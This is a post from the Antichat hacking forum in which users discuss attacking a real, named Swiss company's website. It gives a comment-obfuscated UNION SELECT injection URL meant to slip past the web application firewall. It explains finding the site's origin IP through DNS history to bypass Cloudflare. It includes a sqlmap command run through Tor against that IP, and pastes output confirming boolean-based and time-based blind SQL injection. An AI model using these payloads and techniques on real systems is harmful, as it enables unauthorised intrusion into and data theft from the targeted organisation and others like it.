ANTICHAT - Показать сообщение отдельно - Ваши вопросы по уязвимостям.

Цитата:

Сообщение от DezMond™

↑
Помогите ваф обойти, фильтрует и юнион и селект

Код:

https://www.baslerhofmann.ch/index.php?id=2649&L=3&tx_cabagjobs_pi1%5BjobUid%5D=914+/*!12345uNIoN*/++/*!12345sELecT*/+1,2,3,4,5+--+

Тут надо клоуд обходить, смотрим ип через DNS history:

____viewdns.info/iphistory/?domain=baslerhofmann.ch

Там будет такая запись:

Цитата:

Сообщение от None

5.148.171.143
Switzerland Nine Internet Solutions AG, Switzerland 2020-12-21

Далее просто направляем скульмап и радуемся жизни:

Цитата:

Сообщение от None

sqlmap --url="
https://5.148.171.143/index.php?id=2649&L=3&tx_cabagjobs_pi1[jobUid]=914*
" --host="
www.baslerhofmann.ch
" --random-agent --tor --tor-port=9150 --tor-type=SOCKS5 --threads=10 --dbms=Mysql --dbs --batch

Итого, что мы имеем:

Цитата:

Сообщение от None

---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload:
https://5.148.171.143:443/index.php?id=2649&L=3&tx_cabagjobs_pi1[jobUid]=914
AND 5542=5542
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
https://5.148.171.143:443/index.php?id=2649&L=3&tx_cabagjobs_pi1[jobUid]=914
AND (SELECT 2193 FROM (SELECT(SLEEP(10)))xYPO)
---